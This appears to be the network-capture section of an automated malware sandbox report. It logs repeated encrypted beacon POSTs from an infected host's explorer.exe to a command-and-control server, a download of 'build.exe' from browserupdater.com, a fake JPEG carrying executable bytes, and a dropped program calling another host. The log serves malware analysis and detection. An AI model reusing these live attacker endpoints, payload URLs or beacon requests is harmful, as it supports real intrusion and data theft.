                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:50:39.740627050 CEST | 277 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://idvimpvmdkks.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 303
                          Host: mzxn.ru
                          Aug 6, 2024 14:50:39.740658998 CEST | 303 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3c 07 fa e5
                          Aug 6, 2024 14:50:41.268623114 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:50:40 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          24 | 192.168.2.4 | 49765 | 58.151.148.90 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:50:44.946572065 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://bekxhhsmaopjub.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 293
                          Host: mzxn.ru
                          Aug 6, 2024 14:50:44.946592093 CEST | 293 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 67 3c e1 9a
                          Aug 6, 2024 14:50:46.436702013 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:50:46 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          25 | 192.168.2.4 | 49766 | 58.151.148.90 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:50:50.238221884 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://gjmkiqrlvkslwsem.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 339
                          Host: mzxn.ru
                          Aug 6, 2024 14:50:50.238255978 CEST | 339 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 38 5a af 87
                          Aug 6, 2024 14:50:51.716818094 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:50:51 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          26 | 192.168.2.4 | 49767 | 190.187.52.42 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:50:57.948179007 CEST | 276 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://mgctvlvgdog.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 270
                          Host: mzxn.ru
                          Aug 6, 2024 14:50:57.948189020 CEST | 270 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2f 38 c7 e4
                          Aug 6, 2024 14:50:59.093554974 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:50:58 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          27 | 192.168.2.4 | 49768 | 190.187.52.42 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:51:03.083345890 CEST | 277 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://keqkgetrekoo.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 118
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:03.083379030 CEST | 118 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2c 0c fd 8d
                          Aug 6, 2024 14:51:04.254211903 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:04 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          28 | 192.168.2.4 | 49769 | 190.187.52.42 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:51:08.417753935 CEST | 277 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://vqvtaxxtrjbp.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 229
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:08.417779922 CEST | 229 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2c 0f c5 bd
                          Aug 6, 2024 14:51:09.566629887 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:09 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          29 | 192.168.2.4 | 49770 | 190.187.52.42 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:51:13.661300898 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://ovdrqgaphhsrkg.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 348
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:13.661329985 CEST | 348 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 63 17 c5 9d
                          Aug 6, 2024 14:51:14.828363895 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:14 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          30 | 192.168.2.4 | 49771 | 190.187.52.42 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:51:18.705127954 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://jgwoffhiempfd.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 130
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:18.705153942 CEST | 130 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 33 ee e4
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vus3r!B}lfSE]x+=cb/3
                          Aug 6, 2024 14:51:19.866970062 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:19 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          31 | 192.168.2.4 | 49772 | 190.187.52.42 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:51:23.501054049 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://biwmwjkqpuwangh.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 143
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:23.504863024 CEST | 143 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2d 2b d8 82
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vu-+QnHn:0\>}Dz7Y'9/n0|
                          Aug 6, 2024 14:51:24.925879002 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:24 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          32 | 192.168.2.4 | 49773 | 190.187.52.42 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:51:28.614402056 CEST | 276 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://ydamtofmlce.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 151
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:28.614447117 CEST | 151 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 26 40 fc a8
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vu&@UP_Bf#&g_L0=Z"z@Aj MZ
                          Aug 6, 2024 14:51:29.790728092 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:29 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          33 | 192.168.2.4 | 49774 | 190.187.52.42 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:51:33.447446108 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://yyvupavchggrcv.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 227
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:33.447487116 CEST | 227 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 67 07 a0 b5
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vugT0jN6>#R>4]7K\NOY}7>zVEOOKCY6nWXJQTwC26
                          Aug 6, 2024 14:51:34.617417097 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:34 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          34 | 192.168.2.4 | 49775 | 190.187.52.42 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:51:38.919724941 CEST | 277 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://doftqgthwcaw.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 138
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:38.919754028 CEST | 138 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7f 0b db bc
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vuRR]s*D5=I5vF\
                          Aug 6, 2024 14:51:40.130624056 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:39 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          35 | 192.168.2.4 | 49776 | 190.187.52.42 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:51:44.320075035 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://nddnnutqhypaj.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 217
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:44.320075035 CEST | 217 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 41 31 d8 ac
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vuA1YDllc^F5_5{]EwavVL]XO'*Kgp^kcK5^^1Q)u3QuBm"
                          Aug 6, 2024 14:51:45.563690901 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:45 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          36 | 192.168.2.4 | 49777 | 190.187.52.42 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:51:49.217453003 CEST | 277 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://nmxuerpvqdsp.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 315
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:49.217482090 CEST | 315 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 33 b2 e5
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vu]3r]@rMf*PQ{H})-{CQ<H9z]!*i(&&h6S&->,<B0u"jQzNcPFBb
                          Aug 6, 2024 14:51:50.452819109 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:50 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          37 | 192.168.2.4 | 49778 | 190.187.52.42 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:51:54.156217098 CEST | 277 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://hmylssppqcui.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 337
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:54.156244040 CEST | 337 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 56 5a c6 a2
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vuVZI^GBviKn",k~nD4+1{"<>j4C2tbWM)rSjAO):DB1oC-dMuCC!m[,.
                          Aug 6, 2024 14:51:55.336523056 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:55 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          38 | 192.168.2.4 | 49779 | 190.187.52.42 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:51:59.424931049 CEST | 277 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://viiuigfvqxtv.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 152
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:59.424964905 CEST | 152 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 59 0b cd fb
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vuYxDdyK:K$<:*\Bq,DJ8]n/X^[b1[I
                          Aug 6, 2024 14:52:00.583287001 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:52:00 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.4 | 49751 | 45.130.41.250 | 443 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-06 12:48:51 UTC | 165 | OUT | GET /build.exe HTTP/1.1
                          Connection: Keep-Alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Host: browserupdater.com
                          2024-08-06 12:48:51 UTC | 337 | IN | HTTP/1.1 200 OK
                          Server: nginx-reuseport/1.21.1
                          Date: Tue, 06 Aug 2024 12:48:51 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 2064896
                          Last-Modified: Fri, 02 Aug 2024 22:46:26 GMT
                          Connection: close
                          ETag: "66ad61c2-1f8200"
                          Expires: Thu, 05 Sep 2024 12:48:51 GMT
                          Cache-Control: max-age=2592000
                          Accept-Ranges: bytes


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.4 | 49754 | 185.149.100.242 | 443 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-08-06 12:48:58 UTC | 179 | OUT | GET /wp-content/images/pic5.jpg HTTP/1.1
                          Connection: Keep-Alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Host: mussangroup.com
                          2024-08-06 12:48:58 UTC | 451 | IN | HTTP/1.1 200 OK
                          Connection: close
                          cache-control: public, max-age=604800
                          expires: Tue, 13 Aug 2024 12:48:58 GMT
                          content-type: image/jpeg
                          last-modified: Fri, 02 Aug 2024 22:42:26 GMT
                          accept-ranges: bytes
                          content-length: 2097152
                          date: Tue, 06 Aug 2024 12:48:58 GMT
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2024-08-06 12:48:59 UTC16384INData Raw: 44 24 28 e9 00 00 00 00 48 8b 44 24 28 48 83 c4 68 c3 06 b7 51 20 e9 60 fd ff ff c6 3f 07 63 e9 9f fe ff ff 48 83 ec 38 48 89 c8 48 89 44 24 20 48 c7 01 00 00 00 00 48 c7 41 08 00 00 00 00 48 8b 02 48 89 44 24 28 48 8b 42 08 48 89 44 24 30 48 8d 54 24 28 e8 f6 b7 ff ff 48 8b 44 24 20 48 83 c4 38 c3 48 83 ec 38 48 89 4c 24 28 e8 76 bc fe ff 48 8b 4c 24 28 48 89 44 24 30 e8 9f 10 03 00 48 8b 44 24 30 80 78 60 00 0f 85 0a 00 00 00 48 8b 4c 24 28 e8 f5 12 03 00 90 48 83 c4 38 c3 48 83 ec 58 48 89 54 24 40 48 89 4c 24 48 4c 8b 01 31 c0 89 c1 48 83 e9 ff 4c 89 c0 48 29 c8 48 89 44 24 50 48 89 c1 48 83 f1 ff 48 89 c2 48 83 f2 ff 48 21 d1 4c 89 c2 48 09 d2 49 b9 79 23 21 e4 7d 37 fe cd 49 ba 86 dc de 1b 82 c8 01 32 4d 31 d1 4c 31 ca 48 09 d1 48 83 f1 ff 48 89 c2
                          Data Ascii: D$(HD$(HhQ `?cH8HHD$ HHAHHD$(HBHD$0HT$(HD$ H8H8HL$(vHL$(HD$0HD$0x`HL$(H8HXHT$@HL$HL1HLH)HD$PHHHHH!LHIy#!}7I2M1L1HHH
                          2024-08-06 12:48:59 UTC16384INData Raw: 3d 2d c0 33 50 c2 69 c0 4f 4f 17 cf 3d 9d c0 e3 1d 0f 86 1b 00 00 00 48 81 c4 80 00 00 00 5e c3 64 12 02 36 e9 f8 fb ff ff d7 19 5f e2 e9 1b fd ff ff 74 c1 70 98 e9 96 ff ff ff 0f 1f 44 00 00 48 83 ec 38 48 89 54 24 28 48 89 4c 24 30 8b 05 44 b8 1b 00 31 d2 f7 35 40 b8 1b 00 41 89 c0 44 89 c0 83 f0 ff 25 bd 47 b9 73 41 b9 ff ff ff ff 41 81 f1 bd 47 b9 73 45 21 c8 b9 ff ff ff ff 81 f1 06 c8 fc e5 81 e1 bd 47 b9 73 ba f3 17 3c fb 81 f2 f5 df c0 1e 44 21 ca 44 09 c0 09 d1 31 c8 2d 9a 03 ad 9d 25 40 69 0b fb 3d 8d 54 e8 be 0f 87 a8 00 00 00 48 8b 4c 24 30 8b 15 e0 b7 1b 00 23 15 de b7 1b 00 89 d0 09 c0 83 f0 ff 41 b8 84 a9 f7 7a 41 81 c8 84 a9 f7 7a 41 83 f0 ff 44 09 c0 83 f0 ff 41 b8 0b 52 62 82 41 81 f0 8f fb 95 f8 44 09 c2 83 f2 ff 83 f0 ff 83 f2 ff 21 d0
                          Data Ascii: =-3PiOO=H^d6_tpDH8HT$(HL$0D15@AD%GsAAGsE!Gs<D!D1-%@i=THL$0#AzAzADARbAD!


                          Session ID:2
                          Source IP:192.168.2.4
                          Source Port:49757
                          Destination IP:188.114.97.3
                          Destination Port:443
                          PID:5820
                          Process:C:\Users\user\AppData\Local\Temp\70C1.exe
                          Timestamp:2024-08-06 12:49:10 UTC
                          Bytes transferred:359
                          Direction:OUT
                          Data:
                          POST /dnbcompany_lt1jns?r8nly8r5hpamvqwa=wPH3ORWQpCff0Rbkjeq7BHUXYUTSjq2ZvEO74fzamCqz4bPud6wNFWcNcvb5H2uEbiUuLc8s9wrJ4LD3%2BwxZ6g%3D%3D HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
                          Content-Length: 96
                          Host: mundoparachicas.space
                          Timestamp:2024-08-06 12:49:10 UTC
                          Bytes transferred:96
                          Direction:OUT
